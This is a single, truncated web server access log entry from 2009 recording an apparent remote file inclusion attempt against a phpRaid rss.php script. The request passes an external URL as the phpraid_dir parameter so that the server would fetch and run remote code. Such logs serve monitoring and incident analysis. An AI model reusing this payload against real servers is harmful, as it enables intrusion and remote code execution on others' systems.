195.207.160.102 - - [22/Jun/2009:07:08:42 -0400] "GET /logs/access_log.Q109050900/rss.php?phpraid_dir=http://netseoul.com/board/copyright.txt???? H